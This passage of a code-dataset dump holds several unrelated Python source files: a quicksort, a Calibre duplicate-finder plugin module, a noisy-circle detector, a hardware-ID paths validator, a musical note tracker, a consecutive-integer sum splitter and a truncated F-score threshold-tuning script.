sys.exit(main())\n\n","sub_path":"src/yubijo/chapter01.py","file_name":"chapter01.py","file_ext":"py","file_size_in_byte":18796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"324595100","text":"class Solution:\n def qsort(self, array):\n start = 0\n end = len(array) - 1\n self.dive(array, start, end)\n return array\n\n def dive(self, array, start, end):\n index = self.divide(array, start, end)\n\n if index - start > 1:\n self.dive(array, start, index - 1)\n if end - index > 1:\n self.dive(array, index + 1, end)\n\n def divide(self, array, start, end):\n last = array[end]\n index = start\n for i in range(start, end + 1):\n if array[i] < last:\n array[index], array[i] = array[i], array[index]\n index += 1\n array[index], array[i] = array[i],array[index]\n return index\n\nprint(Solution().qsort([1, 3, 5, 67, -1, 0, 0]))","sub_path":"qsort.py","file_name":"qsort.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"53731327","text":"#!/usr/bin/env python\n# ~*~ coding: utf-8 ~*~\nfrom __future__ import (unicode_literals, division, absolute_import,\n print_function)\n\n__license__ = 'GPL v3'\n__copyright__ = '2020, Ahmed Zaki '\n__docformat__ = 'restructuredtext en'\n\n\nfrom collections import OrderedDict, defaultdict\nfrom functools import partial\nimport copy\nimport time\n\n# python3 compatibility\nfrom six import text_type as unicode\nfrom six import string_types as basestring\nfrom six.moves import range\n\nfrom calibre import prints\nfrom calibre.constants import DEBUG\nfrom calibre.ebooks.metadata.book.base import Metadata\n\nfrom calibre_plugins.find_duplicates.duplicates import DuplicateFinder, CrossLibraryDuplicateFinder\nfrom calibre_plugins.find_duplicates.book_algorithms import AlgorithmBase\nfrom calibre_plugins.find_duplicates.dialogs import SummaryMessageBox\nfrom calibre_plugins.find_duplicates.advanced.hash_functions import HashFuncs\nfrom calibre_plugins.find_duplicates.variation_algorithms import VariationAlgorithm\nfrom calibre_plugins.find_duplicates.advanced.sort import get_sort_value, sort_filters_has_templates\n\ntry:\n load_translations()\nexcept NameError:\n prints(\"FindDuplicates::advanced/__init__.py - exception when loading translations\")\n pass\n\nclass AdvancedAlgorithm(AlgorithmBase, HashFuncs):\n def __init__(self, gui, db, match_rules, exemptions_map, flags, sort_filters=[]):\n AlgorithmBase.__init__(self, gui, db, exemptions_map)\n self.match_rules = match_rules\n self.sort_filters = 
sort_filters or [{'field': 'authors', 'is_reversed':False},{'field': 'title', 'is_reversed':False}]\n self.flags = flags\n self.mi_cache = {}\n\n def find_candidate(self, book_id, candidates_map, include_languages=False):\n if self.flags.get('fetch_mi'):\n mi = self.db.new_api.get_proxy_metadata(book_id)\n # might need the mi object for use with sort filters later on.\n self.mi_cache[book_id] = mi\n else:\n # if no templates, get an empty mi to help performance.\n mi = Metadata(_('Unknown'))\n\n all_hashes = self.book_metadata_hash(self.db, book_id, self.match_rules, mi)\n\n for hash_ in all_hashes:\n # empty hashes are not allowed. they can match thousands of books and hog the system\n # especially in cross library compare.\n if hash_:\n candidates_map[hash_].add(book_id)\n\n def convert_candidates_to_groups(self, candidates_map):\n books_for_group_map, groups_for_book_map = AlgorithmBase.convert_candidates_to_groups(self, candidates_map)\n # Update: sort filters {\n books_for_group_map = self.sort_books_for_group(books_for_group_map, groups_for_book_map)\n # } \n return books_for_group_map, groups_for_book_map\n\n def sort_books_for_group(self, books_for_group_map, groups_for_book_map):\n book_ids = groups_for_book_map.keys()\n if sort_filters_has_templates(self.sort_filters):\n self.update_mi_cache(book_ids)\n mi_map = self.mi_cache\n else:\n mi_map = {}\n for group_id, group in books_for_group_map.items():\n # python sort is stable, so we loop in reverse to apply from lowest to highest sort filters\n for sort_filter in reversed(self.sort_filters):\n sort_field = sort_filter['field']\n is_reversed = sort_filter['is_reversed']\n template_type = sort_filter.get('template_type')\n sort_function = partial(get_sort_value, self.db, sort_field, template_type, mi_map)\n group.sort(key=lambda x: sort_function(x), reverse=is_reversed)\n books_for_group_map[group_id] = group\n return books_for_group_map\n\n def update_mi_cache(self, book_ids):\n for book_id in book_ids:\n if not self.mi_cache.get(book_id):\n mi = self.db.new_api.get_proxy_metadata(book_id)\n self.mi_cache[book_id] = mi\n\nclass AdvancedDuplicateFinder(DuplicateFinder):\n\n # Update: add extra marks\n FIRST_DUPLICATE_MARK = 'first_duplicate'\n LAST_DUPLICATE_MARK = 'last_duplicate'\n GROUP_SORT_MARK = '_sort_'\n DELETED_BINARY_MARK = 'deleted_binary_duplicate'\n ENTANGLED_GROUP_MARK = 'entangled_group'\n ENTANGLED_BOOK_MARK = 'entangled_book'\n #}\n\n def clear_duplicates_mode(self, clear_search=True, reapply_restriction=True):\n self.deleted_binary_duplicates = []\n DuplicateFinder.clear_duplicates_mode(self, clear_search, reapply_restriction)\n\n def run_book_duplicates_check_advanced(\n self,\n match_rules,\n exemptions_type,\n sort_groups_by_title,\n show_all_duplicates_mode,\n sort_filters,\n flags,\n description=_('Advanced algorithm')):\n '''\n Execute a duplicates search using the specified algorithm and display results\n '''\n self.advanced_mode = True\n self.sort_filters = sort_filters\n \n if not self.is_showing_duplicate_exemptions() and not self.has_results():\n # We are in a safe state to preserve the users current restriction/highlighting\n self._persist_gui_state()\n self.clear_duplicates_mode()\n\n self._is_show_all_duplicates_mode = show_all_duplicates_mode\n \n exemptions_map = self._book_exemptions_map\n if exemptions_type == 'author':\n exemptions_map = self._author_exemptions_map\n \n algorithm = AdvancedAlgorithm(self.gui, self.db, match_rules, exemptions_map, flags, sort_filters)\n self._algorithm_text = 
description\n self._duplicate_search_mode = algorithm.duplicate_search_mode()\n\n bfg_map, gfb_map = algorithm.run_duplicate_check(sort_groups_by_title)\n\n self._display_run_duplicate_results(bfg_map, gfb_map)\n\n def _persist_gui_state(self):\n DuplicateFinder._persist_gui_state(self)\n # update: preserve sort {\n self.previous_sort = [self.gui.library_view.model().sorted_on]\n # }\n\n def _restore_previous_gui_state(self, reapply_restriction=True):\n DuplicateFinder._restore_previous_gui_state(self, reapply_restriction)\n # update: preserve sort {\n self.gui.library_view.multisort(self.previous_sort)\n # }\n\n # udpate: entangled_books\n def _get_entangled_gooks_and_groups(self):\n '''\n entangled books: books that are part of more than one group\n entangled groups: groups that have one or more entangled books\n '''\n entangled_books = set()\n entangled_groups = set()\n \n if self._groups_for_book_map:\n for book_id, groups in self._groups_for_book_map.items():\n if len(groups) > 1:\n entangled_books.add(book_id)\n \n if entangled_books and self._books_for_group_map:\n for group_id, group in self._books_for_group_map.items():\n if set(group).intersection(set(entangled_books)) != set():\n entangled_groups.add(group_id)\n \n return entangled_books, entangled_groups\n #}\n\n def _update_marked_books(self, mark_author_exemptions=False):\n '''\n Mark the books using the special 'marked' temp column in Calibre\n Note that we need to store multiple types of marked books at once\n The first is marking all of the duplicate groups\n The second is all duplicate book ids, marked with 'duplicates'\n The third is exemptions marked as 'not_book_duplicate' or 'not_author_duplicate'\n\n This will allow us to apply a search restriction of 'marked:duplicates'\n at the same time as doing a search of 'marked:xxx' for our subset,\n while also allowing the user to refresh to get updated results\n\n The only limitation is making sure that we don't overlap the sets by\n using the same substrings like 'duplicates' in the value of marked_text.\n '''\n # update: \n entangled_books, entangled_groups = self._get_entangled_gooks_and_groups()\n #\n marked_ids = dict()\n # Build our dictionary of current marked duplicate groups\n if self._books_for_group_map:\n remaining_group_ids = list(sorted(self._books_for_group_map.keys()))\n for group_id in remaining_group_ids:\n marked_text = '%s%04d' % (self.DUPLICATE_GROUP_MARK, group_id)\n for idx, book_id in enumerate(self._books_for_group_map[group_id], 1):\n # Update: add sort to books inside group {\n if self.advanced_mode:\n book_marked_text = '%s%s%04d' % (marked_text, self.GROUP_SORT_MARK, idx)\n if idx == len(self._books_for_group_map[group_id]):\n book_marked_text = '{},{}'.format(book_marked_text, self.LAST_DUPLICATE_MARK)\n if idx == 1:\n book_marked_text = '{},{}'.format(book_marked_text, self.FIRST_DUPLICATE_MARK)\n if group_id in entangled_groups:\n book_marked_text = '{},{}'.format(book_marked_text, self.ENTANGLED_GROUP_MARK)\n if book_id in entangled_books:\n book_marked_text = '{},{}'.format(book_marked_text, self.ENTANGLED_BOOK_MARK)\n # }\n else:\n book_marked_text = marked_text\n # }\n if book_id not in marked_ids:\n marked_ids[book_id] = book_marked_text\n else:\n marked_ids[book_id] = '%s,%s' % (marked_ids[book_id], book_marked_text)\n\n # Now add the marks to indicate each book that is in a duplicate group\n if self._groups_for_book_map:\n for book_id in list(self._groups_for_book_map.keys()):\n if book_id not in marked_ids:\n marked_ids[book_id] = 
self.DUPLICATES_MARK\n else:\n # We need to store two bits of text in the one value\n marked_ids[book_id] = '%s,%s' % (marked_ids[book_id], self.DUPLICATES_MARK)\n\n # Add the marks for author duplicate exemptions. This is an expensive operation so\n # we only do it when we really have to (i.e. user is showing author exemptions)\n if mark_author_exemptions:\n if self._author_exemptions_map:\n # Rebuild the map of authors to books\n books_for_author_map = self._create_books_for_author_map()\n for author in list(self._author_exemptions_map.keys()):\n if author in books_for_author_map:\n for book_id in books_for_author_map[author]:\n if book_id not in marked_ids:\n marked_ids[book_id] = self.AUTHOR_EXEMPTION_MARK\n else:\n # We need to store two bits of text in the one value\n marked_ids[book_id] = '%s,%s' % (marked_ids[book_id],\n self.AUTHOR_EXEMPTION_MARK)\n else:\n # Add the marks for book duplicate exemptions\n if self._book_exemptions_map:\n for book_id in list(self._book_exemptions_map.keys()):\n if book_id not in marked_ids:\n marked_ids[book_id] = self.BOOK_EXEMPTION_MARK\n else:\n # We need to store two bits of text in the one value\n marked_ids[book_id] = '%s,%s' % (marked_ids[book_id], self.BOOK_EXEMPTION_MARK)\n\n # Update: mark deleted binaries {\n if self.deleted_binary_duplicates:\n for book_id in self.deleted_binary_duplicates:\n marked_ids[book_id] = '%s,%s' % (marked_ids[book_id], self.DELETED_BINARY_MARK)\n #}\n\n # Assign the results to our database\n self.gui.current_db.set_marked_ids(marked_ids)\n\n def _delete_binary_duplicate_formats(self, books_for_group_map): \n if DEBUG:\n prints('Automatically removing binary format duplicates')\n\n hash_map = self.db.get_all_custom_book_data('find_duplicates', default={})\n for books_list in list(books_for_group_map.values()):\n # Determine the oldest book format in this group\n earliest_book_id = books_list[0]\n earliest_date = self.db.timestamp(earliest_book_id, index_is_id=True)\n for idx in list(range(1, len(books_list))):\n book_date = self.db.timestamp(books_list[idx], index_is_id=True)\n if book_date < earliest_date:\n earliest_book_id = books_list[idx]\n earliest_date = book_date\n other_book_ids = [book_id for book_id in books_list if book_id != earliest_book_id]\n\n book_map = hash_map[earliest_book_id]\n # Now iterate through the formats for this oldest book\n for fmt, info in list(book_map.items()):\n for other_book_id in other_book_ids:\n other_book_map = hash_map[other_book_id]\n if fmt not in other_book_map:\n continue\n other_info = other_book_map[fmt]\n if info['size'] == other_info['size'] and info['sha'] == other_info['sha']:\n if DEBUG:\n prints('Removing duplicate format: %s from book: %d'%(fmt, other_book_id))\n self.db.remove_format(other_book_id, fmt, index_is_id=True, notify=False)\n # Update: mark entries whose duplicate format is deleted automatically during binary compare {\n self.deleted_binary_duplicates.append(other_book_id)\n #}\n\nclass AdvancedCrossLibraryDuplicateFinder(CrossLibraryDuplicateFinder):\n def run_library_duplicates_check(self, library_path, match_rules, flags):\n self.flags = flags\n self.library_path = library_path\n self.match_rules = match_rules\n from calibre.library import db as DB\n self.target_db = DB(self.library_path, read_only=True)\n\n # We will re-use the elements of the same basic algorithm code, but\n # only by calling specific functions to control what gets executed\n # since the approach for comparing all books in one library with another\n # significantly differs. 
Also of course book exemptions will not apply.\n\n message = self._do_comparison()\n\n self.gui.status_bar.showMessage('Duplicate search completed', 3000)\n txt = self.log.plain_text\n if txt:\n txt = _('Results of {0} comparison:\\n Source library: {1}\\n Target library: {2}\\n\\n{3}').format(\n self.algorithm_text, self.db.library_path, self.library_path, txt)\n d = SummaryMessageBox(self.gui, 'Library Duplicates', message, det_msg=txt)\n d.exec_()\n\n def _do_comparison(self):\n '''\n When analysing the current database, we do not want to hash every book with\n every other book in this database. Instead we want to determine the hash\n and then compare it with the hashes we have from the other database.\n So we will not be reporting duplicates within this database, only duplicates\n from each individual book in this database with the target database.\n '''\n algorithm = AdvancedAlgorithm(self.gui, self.db, self.match_rules, exemptions_map=None, flags=self.flags)\n self.algorithm_text = 'Advanced Algorithm'\n duplicates_count = 0\n duplicate_book_ids = None\n\n duplicates_count, duplicate_book_ids, msg = self._do_advanced_comparison(algorithm)\n\n if duplicates_count > 0:\n msg += \"

\" + _(\"Click 'Show details' to see the results.\")\n if duplicate_book_ids is not None:\n marked_ids = {}\n for book_id in duplicate_book_ids:\n marked_ids[book_id] = 'library_duplicate'\n self.gui.current_db.set_marked_ids(marked_ids)\n self.gui.search.set_search_string('marked:library_duplicate')\n return msg\n\n def _do_advanced_comparison(self, algorithm):\n self.gui.status_bar.showMessage(_('Analysing duplicates in target database...'), 0)\n target_candidates_map, author_bookids_map_unused = self._analyse_target_database()\n\n # Use the standard approach to get current library book ids for consideration\n book_ids = algorithm.get_book_ids_to_consider()\n duplicate_book_ids = []\n\n self.gui.status_bar.showMessage(_('Analysing duplicates in current database...'), 0)\n # Iterate through these books getting our hashes\n for book_id in book_ids:\n # We will create a temporary candidates map for each book, since we are\n # not interested in hashing the current library's books together. And we\n # can't give it the map from the target database, because we won't know\n # which database each group's ids belong to!\n book_candidates_map = defaultdict(set)\n algorithm.find_candidate(book_id, book_candidates_map, include_languages=False)\n # We now have any hash(s) for the current book in our candidates map.\n # See if we have them in our target library map too to indicate a duplicate\n duplicate_books = set()\n for book_hash in book_candidates_map:\n if book_hash in target_candidates_map:\n duplicate_books |= target_candidates_map[book_hash]\n if len(duplicate_books) > 0:\n duplicate_book_ids.append(book_id)\n self.log('Book in this library: %s'%self._get_book_display_info(self.db, book_id, include_identifier=False))\n dups = [self._get_book_display_info(self.target_db, dup_book_id)\n for dup_book_id in duplicate_books]\n for dup_text in sorted(dups):\n self.log(' Target library: %s'%dup_text)\n self.log('')\n\n msg = _('Found {0} books with potential duplicates using {1} against the library at: {2}').format(len(duplicate_book_ids), self.algorithm_text, self.library_path)\n return len(duplicate_book_ids), duplicate_book_ids, msg\n\n def _analyse_target_database(self):\n '''\n Get the candidates using algorithm against the target database.\n Similar to a regular duplicate check except that:\n (a) it applies to a different database\n (b) it will not apply restrictions (all_ids, not model ids)\n (c) we do *not* want to shrink the candidates map as we must use it to\n \"add\" candidates from *this* database too.\n '''\n algorithm = AdvancedAlgorithm(self.gui, self.target_db, self.match_rules, exemptions_map=None, flags=self.flags)\n self.algorithm_text = 'Advanced Algorithm'\n\n book_ids = self.target_db.all_ids()\n\n target_candidates_map = algorithm.find_candidates(book_ids, include_languages=False)\n author_bookids_map = None\n # Bit of a bodge. 
If we are running an author only comparison, we want\n # the additional map that algorithm creates listing the books per author\n # in order to display that information in the log results.\n if hasattr(algorithm, 'author_bookids_map'):\n author_bookids_map = algorithm.author_bookids_map\n return target_candidates_map, author_bookids_map\n\nclass AdvancedVariationAlgorithm(VariationAlgorithm, HashFuncs):\n\n def run_variation_check(self, match_rules, possible_cols):\n '''\n The entry point for running the algorithm\n '''\n self.possible_cols = possible_cols\n \n item_type = match_rules[0]['field']\n \n data_map = self._get_items_to_consider(item_type)\n \n all_metadata = self.db.new_api.field_metadata.all_metadata()\n self.fn = partial(self.metadata_item_hash, match_rules, all_metadata)\n start = time.time()\n\n # Get our map of potential duplicate candidates\n if DEBUG:\n prints('Find Duplicates: Analysing %d %s for duplicates...' % (len(data_map), item_type))\n candidates_map = self._find_candidates(data_map)\n\n # Convert our dictionary of potential candidates into a map by\n # item id that has flattened the results out.\n matches_for_item_map = self._flatten_candidates_for_item(candidates_map, data_map)\n\n # Now lookup how many books there are for each candidate\n count_map = self._get_counts_for_candidates(matches_for_item_map, item_type)\n\n if DEBUG:\n prints('Find Duplicates: Completed duplicate analysis in:', time.time() - start)\n prints('Find Duplicates: Found %d duplicate groups'%(len(matches_for_item_map),))\n\n return data_map, count_map, matches_for_item_map\n\n def _get_items_to_consider(self, item_type):\n '''\n Return a map of id:text appropriate to the item being analysed\n '''\n # Ensure that when we ask for authors with ids etc, make sure that we\n # are only getting the records that are linked to books and not stale data\n # (which was fixed on 0.8.61)\n from calibre.customize import numeric_version\n if numeric_version < (0, 8, 61):\n self.db.clean()\n if item_type == 'authors':\n results = self.db.get_authors_with_ids()\n results = [(a[0], a[1].replace('|',',')) for a in results]\n elif item_type == 'series':\n results = self.db.get_series_with_ids()\n elif item_type == 'publisher':\n results = self.db.get_publishers_with_ids()\n elif item_type == 'tags':\n results = self.db.get_tags_with_ids()\n else:\n #raise Exception('Unknown item type:', item_type)\n # Update: add custom column to metadata variations {\n results = self.db.get_custom_items_with_ids(self.possible_cols[item_type]['label'])\n #}\n return dict((x[0],x[1]) for x in results)\n","sub_path":"advanced/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":22399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"318813981","text":"import numpy as np\nfrom shapely.geometry.point import Point\nfrom skimage.draw import circle_perimeter_aa\nimport matplotlib.pyplot as plt\nimport cv2\n\ndef draw_circle(img, row, col, rad):\n rr, cc, val = circle_perimeter_aa(row, col, rad)\n valid = (\n (rr >= 0) &\n (rr < img.shape[0]) &\n (cc >= 0) &\n (cc < img.shape[1])\n )\n img[rr[valid], cc[valid]] = val[valid]\n return img\n\ndef noisy_circle(size, radius, noise):\n img = np.zeros((size, size), dtype=np.float)\n\n # Circle\n row = np.random.randint(size)\n col = np.random.randint(size)\n rad = np.random.randint(10, max(10, radius))\n img = draw_circle(img, row, col, rad)\n\n # Noise\n img += noise * np.random.rand(*img.shape)\n return (row, col, 
rad), img\n\n\n# def normalize_range(img):\n# '''\n# Normalizes range of input image\n# @param img: input image\n# @return img: image in range [0,255]\n \n# '''\n# img = 255*(img - np.min(img))/(np.max(img) - np.min(img))\n# img = img.astype(\"uint8\")\n# return img\n\n\n# def clean_circle(params, size=200):\n# '''\n# Creates an image of the clean circle for model training\n \n# '''\n# row, col, rad = params\n# img = np.zeros((size, size), dtype=np.float)\n# img = draw_circle(img, row, col, rad)\n# return img\n\n\ndef find_circle(img):\n circles = cv2.HoughCircles(img, cv2.HOUGH_GRADIENT, 1, 100,\n param1=30,\n param2=15,\n minRadius=0,\n maxRadius=0)\n if circles is not None:\n params = circles[0][0]\n col, row, rad = int(params[0]), int(params[1]), int(params[2])\n return (row, col, rad)\n else:\n return (1,1,1)\n\n\ndef iou(params0, params1):\n row0, col0, rad0 = params0\n row1, col1, rad1 = params1\n\n shape0 = Point(row0, col0).buffer(rad0)\n shape1 = Point(row1, col1).buffer(rad1)\n\n return (\n shape0.intersection(shape1).area /\n shape0.union(shape1).area\n )\n\n\ndef main():\n results = []\n training_dataset = []\n for i in range(1000):\n params, img = noisy_circle(200, 50, 2)\n \n tmp = {}\n tmp['params'] = params\n tmp['img'] = img\n training_dataset.append(tmp)\n \n detected = find_circle(img)\n results.append(iou(params, detected))\n results = np.array(results)\n print((results > 0.7).mean())\n \n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"420163625","text":"import logging\nimport re\nfrom collections import defaultdict\n\nimport HWID.Database\n\nclass PathsHwidValidator():\n \"\"\"Validates all the lines of paths.txt.\"\"\"\n\n prog = re.compile(r\"^(?P\\d+)(?P[UD]) (?P\\d+) (?P\\d+)$\")\n\n def __init__(self, variant):\n self.PathsHWIDTable = defaultdict(list)\n\n # process uplink path HWIDs for variant\n for k in range(variant.UplinkPathVariantsLength()):\n pathVariant = variant.UplinkPathVariants(k)\n for l in range(pathVariant.RevisionsLength()):\n pathRevision = pathVariant.Revisions(l)\n self.PathsHWIDTable[('U', pathVariant.VariantCode())].append(pathRevision.RevisionCode())\n\n # process downlink path HWIDs for variant\n for k in range(variant.DownlinkPathVariantsLength()):\n pathVariant = variant.DownlinkPathVariants(k)\n for l in range(pathVariant.RevisionsLength()):\n pathRevision = pathVariant.Revisions(l)\n self.PathsHWIDTable[('D', pathVariant.VariantCode())].append(pathRevision.RevisionCode())\n\n\n def validate(self, pathsTxt_path):\n with open(pathsTxt_path) as pathsTxt:\n for pathHwidLine in pathsTxt:\n if not self.validatePatternMatching(pathHwidLine, pathsTxt_path):\n return False\n\n pathsTxt.seek(0)\n if not self.validateIdConsistency(pathsTxt, 'U', pathsTxt_path):\n return False\n\n pathsTxt.seek(0)\n if not self.validateIdConsistency(pathsTxt, 'D', pathsTxt_path):\n return False\n\n pathsTxt.seek(0)\n for pathHwidLine in pathsTxt:\n if not self.validateDatabaseMatching(pathHwidLine, pathsTxt_path):\n return False\n\n return True\n\n\n def validatePatternMatching(self, pathHwidLine, pathsTxt_path):\n match = PathsHwidValidator.prog.match(pathHwidLine)\n if not match:\n logging.error( u'File ' + pathsTxt_path + ' is not valid. 
Line ' + pathHwidLine + ' do not match the pattern.')\n return False\n return True\n\n\n def validateIdConsistency(self, pathsTxt, direction, pathsTxt_path):\n ids = []\n for pathHwidLine in pathsTxt:\n match = PathsHwidValidator.prog.match(pathHwidLine)\n groups = match.groupdict()\n if groups['direction'] == direction:\n ids.append(int(groups['id']))\n\n if not ids:\n logging.error( u'File ' + pathsTxt_path + ' is not valid. No lines for ' + direction + ' direction.')\n return False\n\n if not ids == list(range(1, max(ids) + 1)):\n logging.error( u'File ' + pathsTxt_path + ' is not valid. Ids should make a sequence of numbers starting from 1, with no duplicates and gaps.')\n return False\n\n return True\n\n\n def validateDatabaseMatching(self, pathHwidLine, pathsTxt_path):\n match = PathsHwidValidator.prog.match(pathHwidLine)\n groups = match.groupdict()\n direction = groups['direction']\n variant = int(groups['variant'])\n revision = int(groups['revision'])\n\n if not (direction, variant) in self.PathsHWIDTable:\n logging.error( u'File ' + pathsTxt_path + ' is not valid. Line ' + pathHwidLine + ' do not match the database. Direction and variant do not match.')\n return False\n\n if all (dbrevision > revision for dbrevision in self.PathsHWIDTable[(direction, variant)]):\n logging.error( u'File ' + pathsTxt_path + ' is not valid. Line ' + pathHwidLine + ' do not match the database. Revision is not supported.')\n return False\n\n return True\n\n","sub_path":"tools/PathsHwidValidator.py","file_name":"PathsHwidValidator.py","file_ext":"py","file_size_in_byte":3668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"541067252","text":"\nfrom collections import defaultdict\nfrom note import Note, Chord\n\nclass Tracker():\n\t\"\"\"docstring for Tracker\"\"\"\n\tdef __init__(self, sheet):\n\t\tself.sheet = sheet\n\t\tself.fixRange(0, len(sheet))\n\t\t\n\tdef fixRange(self, start, end):\n\t\t# start to end non inclusive\n\t\tself.length = end - start\n\t\tself.notePosition = defaultdict(list)#try a linked list\n\t\tfor i, n in enumerate(self.sheet[start : end + 1]):\n\t\t\tself.notePosition[n.name].append(i)\n\t\tself.lastPosition = []\n\n\tdef locate(self, note, tempo = 0):\n\t\tif self.length == 0:\n\t\t\treturn []\n\t\tmatch = []\n\t\tfor lp in self.lastPosition:\n\t\t\tif lp + 1 >= self.length:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tif tempo == 0:\n\t\t\t\t\tnextNote = self.ignoreRests(lp + 1)\n\t\t\t\t\tif nextNote == self.length:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif self.sheet[nextNote] == note:\n\t\t\t\t\t\t# print('tempoless match at', nextNote)\n\t\t\t\t\t\tmatch.append(nextNote)\n\t\t\t\telse:\n\t\t\t\t\tif str(self.sheet[lp + 1]) == str(note):\n\t\t\t\t\t\t# print('tempo match at', lp + 1)\n\t\t\t\t\t\tmatch.append(lp + 1)\n\t\tif len(match) == 0:\n\t\t\tself.lastPosition = self.notePosition[note.name]\n\t\telse:\n\t\t\tself.lastPosition = match\n\t\treturn self.lastPosition\n\n\tdef ignoreRests(self, start):\n\t\twhile start < self.length and self.sheet[start].name == 'rest':\n\t\t\tstart += 1\n\t\t\tcontinue\n\t\treturn start\n\n\tdef recognise(self, source):\n\t\tpass\n\ntest = ['C', 'A', 'B', 'C', 'B', 'rest', 'rest', 'rest', 'C', \\\n\t'D', 'E', 'C', 'B', 'A#', 'Ab', 'B', 'F', 'E', 'G', 'rest', 'rest', 'rest']\nwaltz = [Note(t, i, (1, 4)) for i, t in enumerate(test)]\ntestin = ['B', 'C', 'E', 'B', 'G', 'A']\nhits = [Note(h, i, (1, 3)) for i, h in enumerate(testin)]\n\nT = Tracker(waltz)\nfor t in T.notePosition:\n\tprint(t, 
T.notePosition[t])\nfor h in hits:\n\tprint('locating', h, ':', T.locate(h))\n\n\n","sub_path":"locate.py","file_name":"locate.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"447623546","text":"\"\"\"\n某些整数能分解成若干个连续整数的和的形式,例如\n15 = 1 + 2+3+4+5\n15 = 4 + 5 + 6\n
15 = 7 + 8\n某些整数不能分解为连续整数的和,例如:16 
\n输入: 一个整数N(N <= 10000)\n输出:整数N对应的所有分解组合,按照每个分解中的最小整数从小到大输出,\n每个分解占一行 ,每个数字之间有一个空格(每 行最后保留一个空格);\n如果没有任何分解组合, 则输出NONE。\n\n\"\"\"\n# *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n# 进行所有因数的判断 包含整数和0.5型\n# 根据题意, 15没有分解成 15 = 0 + 1 + 2 + 3 + 4 + 5\n# 故在本题中不考虑0的情况\n\n# 思路: 每个分解成开的连续整数都可以看成\n# avg(连续整数) * 个数\n# 如果'个数'是奇数, avg(连续整数)就必须是整数\n# 如果'个数'是偶数, avg(连续整数)就必须是0.5型的整数\n# 用这个思路, 做出判断\n# 首先, 先做出 可以整除整数和0.5型整数的数字, 放入字典\n# 然后, 循环字典的键和值, 组成字符串\n# *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n\n\nj_dict = {}\ni_dict = {}\nstring_list = []\n\n\ndef yin_shu(num):\n \"\"\"\n 做出字典{可以整除的数字: 个数}\n :param num:\n :return:\n \"\"\"\n global i_list, j_dict\n for j in range(2, int((num + 1) / 2) + 1): # 循环2 到 num/2\n if num % j == 0: # 获得整数因子\n j_dict[j] = int(num / j) # 字典形式储存 整数因子:整除的数\n if num % (j + 0.5) == 0: # 获得0.5型因子\n j_dict[j + 0.5] = int(num / (j + 0.5)) # 字典形式储存\n\n\n# print(j_dict)\n\n\ndef make_string(j_dict):\n \"\"\"\n 循环字典的键和值, 组成字符串\n :param j_dict:\n :return:\n \"\"\"\n global string_list\n for k, v in j_dict.items():\n # print((k, v))\n if k <= v / 2: # 不可能实现,这里把'等于'排除,因为本题不包含0的情况\n continue\n if type(k) is int:\n if v % 2 != 0: # k为整数时, v必须是奇数才可以凑出来\n i_dict[k] = v\n string = \"{} = \".format(n)\n for c in range(k - v // 2, (k + v // 2) + 1):\n string += \"{} + \".format(c) # 制作字符串\n else:\n string = string[:-2]\n string_list.append(string)\n else:\n if v % 2 == 0: # k为0.5型数字时, v必须是偶数数才可以凑出来\n i_dict[k] = v\n string = \"{} = \".format(n)\n for c in range(int((k - v // 2) + 0.5), int((k + v // 2) - 0.5 + 1)):\n string += \"{} + \".format(c) # 制作字符串\n else:\n string = string[:-2]\n string_list.append(string)\n\n # print(i_dict)\n # print(string_list)\n if string_list:\n for p_string in string_list:\n print(p_string)\n else:\n print('NULL')\n\n\nif __name__ == '__main__':\n n = 15\n yin_shu(n) # n为你要输入的值\n make_string(j_dict) # 组成字符串打印\n","sub_path":"c2.py","file_name":"c2.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"386147084","text":"from DataParser import DataParser as DataParser\nfrom model3 import Model3 as Model\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import confusion_matrix\nimport numpy as np\nimport matplotlib as plt\n\n\ndef thresholdTuning(tr,pr):\n pre = set(pr)\n pre=set([round(elem,4) for elem in pre])\n bestF=0\n bestThre=0\n pr=np.array(pr)\n for thre in pre:\n scr=f1_score(tr,pr>=thre)\n if scr>bestF:\n bestF=scr\n bestThre=thre\n return bestF,bestThre\n\n \ndef ComputeFscore(modelfile,testfile,outputfile):\n maxParagraphLength=20\n maxParagraphs=10\n #nlabels=1001\n #vocabularySize=76391\n labels=8\n vocabularySize=244\n model = Model(maxParagraphLength,maxParagraphs,labels,vocabularySize)\n\n testing = DataParser(maxParagraphLength,maxParagraphs,labels,vocabularySize)\n testing.getDataFromfile(testfile)\n\n model.load(modelfile)\n\n print(\"loading done\")\n\n testing.restore()\n truePre=[]\n pred=[]\n for itr in range(testing.totalPages):\n data=testing.nextBatch(1)\n truePre.append(data[0])\n pre=model.predict(data)\n pred.append(pre[0])\n\n labelsCount={}\n ConfusionMa={}\n fScr={}\n\n thres=0.5\n valid=int(len(truePre)*0.5) #using first 50% data for threshold tuning - we have merged test and cv files\n labelsCount={}\n ConfusionMa={}\n fScr={}\n thresLab={}\n for la in range(labels):\n if la%25==0:\n print(\"Current label\",la)\n t=[]\n p=[]\n for i in range(valid):\n t.append(truePre[i][0][la])\n p.append(pred[i][la])\n 
